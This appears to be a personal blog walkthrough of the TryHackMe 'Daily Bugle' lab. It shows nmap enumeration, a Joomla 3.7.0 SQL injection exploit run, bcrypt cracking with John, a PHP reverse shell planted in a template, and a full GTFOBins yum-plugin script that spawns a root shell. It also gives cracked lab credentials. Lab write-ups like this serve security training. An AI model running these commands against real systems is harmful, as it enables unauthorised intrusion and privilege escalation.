TryHackMe: Exploiting Joomla 3.7.0: Daily Bugle Walkthrough

Oct 28, 2025 • 4 min read • Intermediate

TryHackMe

Daily Bugle turned out to be a straightforward box that demonstrates classic Joomla exploitation and privilege escalation via yum. The machine runs CentOS with a vulnerable Joomla instance that makes for quick initial access.

Enumeration

The nmap scan showed three open ports. SSH on 22, HTTP on 80, and MySQL on 3306, though the database was rejecting external connections.

1
2
3
4
5
6
7


PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
3306/tcp open  mysql   MariaDB (unauthorized)

The HTTP generator tag immediately identified Joomla, and the robots.txt file confirmed an /administrator directory. Browsing to the site showed a Daily Bugle themed page with an article claiming Spider-Man robbed a bank.

SQL Injection in Joomla 3.7.0

After confirming it was Joomla, I needed to identify the version. Joomla 3.7.0 has a well-known SQL injection vulnerability in the com_fields component. I pulled down the joomblah.py exploit from stefanlucas’s GitHub repo, which automates extracting the user database.

1

python joomblah.py http://10.10.242.106

The script dumped the users table and pulled back credentials for the admin account.

1
2
3
4
5


[-] Fetching CSRF token
[-] Testing SQLi
 -  Found table: fb9j5_users
 -  Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

I also ran sqlmap to verify the injection point and experiment with automated extraction. Sqlmap confirmed the error-based SQL injection in the list[fullordering] parameter.

1
2
3


Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)

Cracking the Hash

The bcrypt hash went into John the Ripper. I tried CrackStation first but it didn’t have the hash in its database, so John with rockyou.txt was the next step.

1

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

John cracked it and returned the password: spiderman123

Getting Code Execution

With admin credentials for Joomla, getting a shell was straightforward. I logged into the admin panel and navigated to the template editor. Joomla templates run PHP, so I dropped a PHP reverse shell into the index.php file of the active template.

After setting up a netcat listener and triggering the template by browsing to the homepage, I got a shell back as the apache user.

Privilege Escalation Path

Once I had a shell, I ran linpeas to enumerate privilege escalation vectors. The scan revealed a non-default user named jjameson and showed that apache could run yum as root without a password.

I also found credentials in the environment or configuration files. The password nv5uz9r3ZEDzVjNu turned out to work for SSH access as jjameson, which gave me a more stable shell and access to the user flag.

1
2


User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

Exploiting Yum for Root

GTFOBins has a documented method for exploiting yum when you can run it with sudo. The approach involves creating a malicious yum plugin that executes arbitrary code when yum loads it.

I created a temporary directory and set up the plugin configuration.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

Running this spawned a root shell immediately. From there, I grabbed the root flag and wrapped up the box.

Quick Takeaways

The SQL injection in Joomla 3.7.0 is trivial to exploit with existing tools. The joomblah script made extraction fast, though sqlmap works just as well if you want more control over the injection process.

The yum privilege escalation is a good reminder that package managers and similar system utilities can be dangerous when combined with overly permissive sudo rules. The same principle applies to apt, pip, gem, and other package managers that can execute arbitrary code.

Credential reuse continues to be effective. The database password working for SSH access as jjameson simplified lateral movement and gave me a cleaner shell to work from.

What’s Next

I’m working through more of the intermediate TryHackMe boxes. Daily Bugle was quick and straightforward, but I want to tackle boxes with more modern defensive configurations and see how enumeration strategies change when you’re dealing with better-hardened systems.

Resources to Get You Started

Joomla 3.7.0 SQL Injection Exploit (GitHub, updated 2017)
The joomblah.py script used in this walkthrough, which automates extracting user credentials from vulnerable Joomla 3.7.0 installations via SQL injection.

GTFOBins Yum Privilege Escalation (GTFOBins, regularly updated)
Comprehensive documentation of methods to exploit yum for privilege escalation, including the plugin-based approach used on this box.

Joomla Security Resources (Joomla Documentation, regularly updated)
Official Joomla hardening guide covering version management, file permissions, and security best practices to prevent the types of vulnerabilities exploited here.